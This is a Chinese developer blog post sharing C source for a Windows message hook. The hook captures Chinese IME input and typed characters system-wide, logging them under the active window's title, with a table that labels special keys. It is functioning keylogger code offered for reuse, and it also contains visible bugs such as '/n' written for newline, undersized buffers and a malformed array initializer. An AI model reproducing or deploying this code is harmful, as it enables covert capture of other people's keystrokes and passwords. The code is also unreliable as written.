关于中文hook的一些问题的处理

本文介绍了如何通过钩子函数处理IME消息WM_IME_COMPOSITION来记录中文输入,同时讨论了WM_CHAR消息下对VK的过滤问题,提供了改进的代码示例,帮助开发者更好地理解和实现中文输入的监测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用钩子记录键盘敲击的字符并不困难,但是如果要直接记录中文输入的内容就不那么容易了。本文应用了IME以及相应的IME消息WM_IME_COMPOSITION实现这一目的,但是对于VK的过滤并不是很成功,现在贴出我的修改版本。当然原来的已经相当不错了,精益求精而已

LRESULT CALLBACK MessageProc(int nCode,WPARAM wParam,LPARAM lParam)
{
 PMSG pmsg = (PMSG)lParam;
 if(nCode==HC_ACTION)
 {
  switch(pmsg->message)
  {
  case WM_IME_COMPOSITION:
   {
    //窗口判定
    hCurWin=::GetActiveWindow();
    ::GetWindowText(hCurWin,CurWin,100);
    if(strcmp(CurWin,PriWin)!=0)
    {
     ::GetWindowText(hCurWin,PriWin,100);
     strcat(Content,"/n<");
     strcat(CurWin,">/n");
     strcat(Content,CurWin);
    }
    HIMC hIMC;
    DWORD dwSize;
    char lpstr[20];
    if(pmsg->lParam & GCS_RESULTSTR)
    {
     hIMC = ImmGetContext(hCurWin);
     dwSize = ImmGetCompositionString(hIMC, GCS_RESULTSTR, NULL, 0);
     dwSize += sizeof(WCHAR);
     memset(lpstr, 0, 20);
     ImmGetCompositionString(hIMC, GCS_RESULTSTR, lpstr, dwSize);
     
     strcat(Content,lpstr);
     ImmReleaseContext(hCurWin, hIMC);

    }
    break;
   }
  case WM_CHAR:
   {
    hCurWin=::GetActiveWindow();
    ::GetWindowText(hCurWin,CurWin,100);
    if(strcmp(CurWin,PriWin)!=0)
    {
     ::GetWindowText(hCurWin,PriWin,100);
     strcat(Content,"/n<");
     strcat(CurWin,">/n");
     strcat(Content,CurWin);
    }
    int nIsVK=0;
    char ch[2];
    for(int m=0; m < MAX_VK_NUM ; m++)
    {
     if(pmsg->wParam==(WPARAM)VKMap[m].VKNum)
     {
      strcat(Content,VKMap[m].VKText);
      m = MAX_VK_NUM;
      nIsVK = 1;
     }
    }
    
    if((nIsVK==0)&&( (pmsg->wParam)<127 ) )    //主要是在这里 把 ASCII马的范围进行一些限制 

//这样 IME条件下输入的VK将被过滤…
    {
     ch[0]=(char)(pmsg->wParam);
     ch[1]='/0';
     strcat(Content,ch);
    }
    
    break;
   }
  }
 }
 return(CallNextHookEx(Hook, nCode, wParam, lParam));
}

我还定义了一个 VK相关的结构体 以缩短 记录函数的长度

#define MAX_VK_TEXT_LEN 15
#define MAX_VK_NUM 11
typedef struct _vkmap           //定义VK映射表
{
 int VKNum;
 char VKText[MAX_VK_TEXT_LEN];
}VKMAP;


VKMAP VKMap[MAX_VK_NUM]=         //为VK映射表赋值

 {VK_ESCAPE,"[esc]"},
     
 {VK_RETURN, "[enter]"},
 {VK_SPACE, "[space]"},
 {VK_BACK, "[backspace]"},

 {VK_LCONTROL,"[left ctrl]"},
 {VK_RCONTROL,"[right ctrl]"},
 {VK_LSHIFT,"[left shift]"},
 {VK_RSHIFT,"[right shift]"},
 {VK_LMENU,"[left alt]"},
 {VK_RMENU,"[right alt]"},
 {VK_TAB,"[tab]"}

 //{VK_NUMLOCK,"[numlock]"},
 //{VK_CAPITAL,"[capslock]"},
 //{VK_SCROLL,"[scrolllock]"},

 //{VK_UP,"[up]"},
 //{VK_DOWN,"[down]"},
 //{VK_LEFT,"[left]"},
 //{VK_RIGHT,"[right]"},

 //{VK_END,"[end]"},
 //{VK_HOME,"[home]"},
 //{VK_INSERT,"[ins]"},
 //{VK_DELETE,"[del]"},
 //{VK_PRIOR,"[pageup]"},
 //{VK_NEXT,"[pagedown]"},

 //{VK_SNAPSHOT,"[print screen]"},
 //{VK_PAUSE,"[pause]"},

 //{VK_LBUTTON,"[mouse left]"},
 //{VK_RBUTTON,"[mouse right]"}
};

这里是情况而定,有些vk需要进行顾虑。有可能MessageProc用WM_CHAR捕捉的输入 与WH_KEYBOARD这个,也就是KeyboardProc这个函数用的机制不一样,很多符号键与VK是相重复的,以前我用的是键盘处理的函数,所以那些VK是可以截获的。希望对大家有所帮助!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值